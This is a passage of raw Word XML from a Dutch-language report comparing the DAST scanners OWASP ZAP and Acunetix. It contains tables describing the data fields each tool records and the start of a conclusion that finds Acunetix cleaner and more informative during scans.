          <w:p w14:paraId="5AFBF25C" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Methode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E8DA444" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">De HTTP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>verb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> die gebruikt is</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="7A7CDDAD" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36B0E9EA" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C0A8429" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">Uniform Resource </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Locator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="1A73B02B" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23512C50" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C1DB347" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Status code van de Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="7FC56891" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="633A2162" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Reden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="481F9C8B" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Dit geeft aan of de Response is gelukt of niet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="7320B5CD" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53498E57" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>RTT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47E68FA0" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Round</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-trip time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="2B131A5E" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50E9E1BD" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Hoogste Waarschuwing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3786024D" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Waarschuwing niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="5790E756" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16E74C30" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Opmerking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42627E37" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="083F6A75" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D07A289" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58F348DF" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">Categorieën van </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Requests</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03E3BD02"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1298A55F" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="52D6B989" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Http Sessies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="651FC497" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="050CF6DF" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Actief</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D6775D1" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Geeft aan welke sessie OWASP ZAP gebruikt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="3D1C5BE9" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EC5C3C1" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53F36FFF" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Naam van sessie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="1DE4D882" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03FEBE0F" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Waardes van Sessie Tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ECDF2B4" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>De sessie token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="0B9E0FA3" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F52A307" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Overeenkomende Berichten</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50453F66" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>De aantal berichten die verzonden zijn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49CAA30D" w14:textId="2E7618C3" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4"/>
    <w:p w14:paraId="03A0B853" w14:textId="77777777" w:rsidR="000625C1" w:rsidRDefault="000625C1" w:rsidP="00554FF4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="141" w:rightFromText="141" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="8"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
        <w:gridCol w:w="4531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00554FF4" w14:paraId="495DFB6F" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7DDE0475" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Params</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="1C1B1379" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35839FC6" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15954F97" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Type parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="1DC8891C" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55C6C499" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="457111E6" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Naam van parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="4EB66891" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3140C7DF" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Gebruikt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D40818B" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Aantal keer gebruikt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="6229C632" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46D66FEC" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Waarden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B908422" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Hoeveel waarden er zijn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="02EE3C21" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77A54EB1" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Veranderingen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BC8D709" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Hoe vaak de parameter veranderd is</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="2B63887A" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="088578E3" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Markeringen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="037B471B" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Opmerking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="39C2441E" w14:textId="77777777" w:rsidTr="00EF276C">
        <w:trPr>
          <w:trHeight w:val="207"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24778B50" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Waarden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19284A97" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>De waarde van een parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79E0C837" w14:textId="2F0F9D21" w:rsidR="008A79F1" w:rsidRPr="00505336" w:rsidRDefault="00505336" w:rsidP="0095687C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00505336">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tabel 3.3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D5A28D" w14:textId="28E41734" w:rsidR="00BA7602" w:rsidRDefault="00BA3D1E" w:rsidP="00BA3D1E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc491022074"/>
      <w:r>
        <w:t xml:space="preserve">3.4.7 </w:t>
      </w:r>
      <w:r w:rsidR="003E572F" w:rsidRPr="003E572F">
        <w:t>Conclusie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="5D4BFFD4" w14:textId="09959ADD" w:rsidR="007B2B46" w:rsidRDefault="007B5B71">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251833344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="553CB876" wp14:editId="157D5D43">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>389890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3202305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4718685" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0"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4718685" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="729DC7E2" w14:textId="36964E5F" w:rsidR="00CE4BB5" w:rsidRPr="004749D1" w:rsidRDefault="00CE4BB5" w:rsidP="007B5B71">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 3.4.1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CB876" id="Text Box 34" o:spid="_x0000_s1053" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:30.7pt;margin-top:252.15pt;width:371.55pt;height:21.2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IhADkCAAB4BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EWEtZRKgYFdOkqq0E&#10;U5+N4xBLts+zDQn79Ts7CWzdnqa9mPPd+bvcfd+xuG+1IifhvART0MloTIkwHEppDgX9ttt8mFPi&#10;AzMlU2BEQc/C0/vl+3eLxuZiCjWoUjiCIMbnjS1oHYLNs8zzWmjmR2CFwWAFTrOAV3fISscaRNcq&#10;m47Hs6wBV1oHXHiP3ocuSJcJv6oED89V5UUgqqD4bSGdLp37eGbLBcsPjtla8v4z2D98hWbSYNEL&#10;1AMLjByd/ANKS+7AQxVGHHQGVSW5SD1gN5Pxm262NbMi9YLD8fYyJv//YPnT6cURWRb04w0lhmnk&#10;aCfaQD5DS9CF82mszzFtazExtOhHnge/R2dsu62cjr/YEME4Tvp8mW5E4+i8uZvMZ/NbSjjGprNP&#10;87vbCJNdX1vnwxcBmkSjoA7ZS0Nlp0cfutQhJRbzoGS5kUrFSwyslSMnhkw3tQyiB/8tS5mYayC+&#10;6gA7j0hS6avEhrvGohXafZsGNE1qia49lGcchoNOTt7yjcTyj8yHF+ZQP9g/7kR4xqNS0BQUeouS&#10;GtyPv/ljPtKKUUoa1GNB/fcjc4IS9dUg4VG8g+EGYz8Y5qjXgI1PcNssTyY+cEENZuVAv+KqrGIV&#10;DDHDsVZBw2CuQ7cVuGpcrFYpCSVqWXg0W8sj9DDmXfvKnO1JCkjvEwxKZfkbrrrcxJZdHQMOPhF5&#10;nSIKIF5Q3kkK/SrG/fn1nrKufxjLnwAAAP//AwBQSwMEFAAGAAgAAAAhAHqfo57hAAAACgEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj7FOwzAQhnck3sE6JBZE7VI3ikKcqqpggKUidGFz42sciM9R7LTh&#10;7TETjHf36b/vLzez69kZx9B5UrBcCGBIjTcdtQoO78/3ObAQNRnde0IF3xhgU11flbow/kJveK5j&#10;y1IIhUIrsDEOBeehseh0WPgBKd1OfnQ6pnFsuRn1JYW7nj8IkXGnO0ofrB5wZ7H5qienYC8/9vZu&#10;Oj29buVqfDlMu+yzrZW6vZm3j8AizvEPhl/9pA5Vcjr6iUxgvYJsKROpYC3kClgCciHXwI5pI7Mc&#10;eFXy/xWqHwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAA&#10;AAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBPciEAOQIAAHgEAAAOAAAAAAAA&#10;AAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQB6n6Oe4QAAAAoBAAAPAAAA&#10;AAAAAAAAAAAAAJEEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnwUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="729DC7E2" w14:textId="36964E5F" w:rsidR="00CE4BB5" w:rsidRPr="004749D1" w:rsidRDefault="00CE4BB5" w:rsidP="007B5B71">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 3.4.1</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C234FB">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251831296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AFE127B" wp14:editId="7C77F021">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>389890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1167130</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4718685" cy="1978025"/>
            <wp:effectExtent l="0" t="0" r="5715" b="317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 acunetix.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4718685" cy="1978025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00C04A36">
        <w:t xml:space="preserve">Uit de testen is gebleken </w:t>
      </w:r>
      <w:r w:rsidR="00392B02">
        <w:t xml:space="preserve">wat de werking is, </w:t>
      </w:r>
      <w:r w:rsidR="00C04A36">
        <w:t xml:space="preserve">wat voor datastructuur beide </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EF5405">
        <w:t>DAST tools</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF5405">
        <w:t xml:space="preserve"> gebruiken en wat voor data zij verzamelen. </w:t>
      </w:r>
      <w:r w:rsidR="00F26424">
        <w:t xml:space="preserve">Fundamenteel zijn er veel gelijkenissen, de richtlijnen van de standaarden volgen van </w:t>
      </w:r>
      <w:r w:rsidR="00A17E12">
        <w:t>WASC (</w:t>
      </w:r>
      <w:r w:rsidR="00ED2946">
        <w:t xml:space="preserve">H </w:t>
      </w:r>
      <w:r w:rsidR="00FE6C9B">
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="008C3E5B">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00D802C7">
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidR="008C3E5B">
        <w:t>, WASC</w:t>
      </w:r>
      <w:r w:rsidR="00A17E12">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00ED2946">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0093267A">
        <w:t xml:space="preserve">Waar de beide </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0093267A">
        <w:t>DAST tools</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0093267A">
        <w:t xml:space="preserve"> in verschillen is de hoeveelheid informatie zij vrijgeven tijdens het scannen en de hoeveelheid data dat zij opslaan. Wat mij opviel was dat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0093267A">
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0093267A">
        <w:t xml:space="preserve"> veel schoner </w:t>
      </w:r>
      <w:r w:rsidR="00227BF6">
        <w:t xml:space="preserve">en eleganter </w:t>
      </w:r>
      <w:r w:rsidR="0093267A">
        <w:t>is dan OWASP</w:t>
      </w:r>
      <w:r w:rsidR="00227BF6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00227BF6">
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00227BF6">
        <w:t xml:space="preserve"> laat tijdens het scannen in het dashboard overzichtelijke en informatieve statistieken o</w:t>
      </w:r>
      <w:r w:rsidR="00F73358">
        <w:t>ver de vooruitgang van de scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20440F50" w14:textId="77777777" w:rsidR="00C234FB" w:rsidRDefault="00C234FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6448C60E" w14:textId="77777777" w:rsidR="00D06E15" w:rsidRDefault="000E1129">
      <w:r>
        <w:t>OWASP is m</w:t>
      </w:r>
